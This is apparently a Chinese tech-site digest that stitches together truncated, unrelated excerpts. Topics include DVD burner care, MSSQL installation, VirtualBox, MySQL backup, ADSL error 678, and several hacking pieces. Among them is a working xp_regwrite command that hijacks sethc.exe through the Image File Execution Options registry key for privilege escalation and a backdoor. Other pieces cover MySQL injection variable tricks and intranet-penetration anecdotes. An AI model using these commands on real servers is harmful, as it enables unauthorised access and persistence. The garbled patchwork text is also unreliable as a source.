随着网络时代的到来，网络安全也成为大家比较关心的问题，但同时我们又不得不多了一些额外的工作，那就是为自己电脑中重要的数据进行及时备份，当然，目前借用DVD刻录机进行备份，不免为一种比较放心的做法。
与只读型DVD-ROM相比，在价格上相差并不是很大的情况下，现在大多用户在配置个人电脑时，大多还是会选择DVD刻录机，毕竟会用它来进行数据的备份。DVD刻录机是以激光头为主要配件的光存储产品，如果平时不注意保养，或是频繁地使用，都容易导致它老化与损坏，笔者根据平时使用体会，总结出一些关于DVD的维护技巧，与大家一起分享。
...

近年来MSSQL在企业中应用非常广泛，为企业数据存储发挥了巨大的作用。可我们广大的开发人员都知道，数据库系统的应用要求在操作系统中安装MSSQL企业版数据库管理系统应用环境，这样才能满足我们的应用需求。但是，MSSQL企业版的安装对操作系统是有要求的，即MSSQL企业版必须安装在服务器版操作系统中，个人版操作系统是不可以安装MSSQL企业版的全部功能的。
 
那么，我们能不能找到一种办法让MSSQL企业版也能成功安装在如Win XP这样的个人版操作系统环境中呢？方法如下：
...

提到Linux系统下的虚拟机软件，大家首先想到的就是VMware和Virtual PC，这两款软件以其强大的功能和众多的用户群体牢牢占据了开放系统虚拟机市场的半壁江山。不过VMware和Virtual PC如今又多了一个强有力的竞争对手，那就是开放系统中的虚拟新贵InnoTek VirtualBox。
VirtualBox是一款针对企业和家庭非常实用的x86虚拟化软件。这款软件体积小巧，安装程序只有区区十几兆大小，但功能丰富，性能强劲，丝毫不输于体积庞大的Vmware。它最令人称道的地方就在于所虚拟系统的性能比较接近于实际的机器设备，虚拟系统运行流畅，具有很高的运行效率。更重要的是VirtualBox是一款基于GNU Public License （GPL）条款的开源专业虚拟化软件系统，这就意味着我们不需要花费大把的银子就可以自由的使用它。
...

sa权限如果xp_cmdshell不可用时，可以尝试用xp_regwrite写注册表，替换sethc.exe实现提权。

代码如下：sa提权技巧之xp_regwrite 替换sethc.exe

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

所有SQLSERVER账号的密码都经过了pwdencrypt这个函数的加密。
比如：

SQL代码
select pwdencrypt('ninty');  

0x01001F32B351238BEEE4411C2006F5D76C7FE66AABC977CB5A803395B514A1CDD5A8DE14C3250AAF89A8B4EA4633
（因为加密算法跟时间有关，所以每次执行所得的值不一样。）

...

平时我们在使用MySQL数据库的时候经常会因为操作失误造成数据丢失，MySQL数据库备份可以帮助我们避免由于各种原因造成的数据丢失或着数据库的其他问题。

一、数据备份捷径

因为这个方法没有得到官方正式文档的验证，我们暂称为试验吧。

目的：备份hostA主机中一个MySQL数据库备份TestA，并恢复到到hostB机中

试验环境：

操作系统：WinNT4.0,Mysql3.22.34,phpMyAdmin 2.1.0

遇到678的常见解决思路和步骤：
1.首先确认adsl modem拨号正常，因为网卡自动获取的IP没有清除，所以再次拨号的时候网卡无法获取新的IP地址会提示678，操作方法是：关闭adsl modem，进入控制面板的网络连接右击本地连接选择禁用，5秒钟后右击本地连接选择启用，然后打开adsl modem拨号即可；
2.如果第一步无效，则在关闭adsl modem的情况下，仍然禁用本地连接（网卡），重启计算机，然后启用本地连接（网卡），再打开adsl modem即可解决;
...

对某款国家级内容过滤系统Dos安全缺陷分析

Author: jianxin [80sec]
EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2009-1-2
From: http://www.80sec.com/release/dos-with-XXX.txt

...

Author:零魂(zerosoul)
Blog: http://hi.baidu.com/0soul

最近运气不好，拿下的某内网，Server区全部不能外连，没法反弹socks出来，导致渗透内网其它网段的时候很辛苦。其中一台MSSQL和Web是分离的，服务器虽然拿下了，但有时候上去执行一些管理员权限才能执行的命令时(该Server是IIS6+ASPX，权限不够)，只能用reDuh上3389，但reDuh实在是太慢了，我现在用reDuh连终端的时候都设置的最低分辨率(640 x 480)和最低色彩(256色)，即使这样好不容易上去了敲个命令还要等半天，实在让人抓狂.....

...

当注射mysql库的输入点的时候,我们可以通过version()/user()/database()/password()等内置函数来得到mysql的相关信息,其实我们在注射的时候可以利用mysql内置的变量来得到更多的mysql信息
其中version()可以写成@@version来把version当做变量来读取,这样一样可以得到,其他的内置是不可以写成变量的形式.
大家都应该用过利用pangolin来注入mysql库的注射点,认真的朋友都应该知道可以的得到basedir和datadir这两个变量的信息,其实还有更多的变量在注射的时候可以利用
...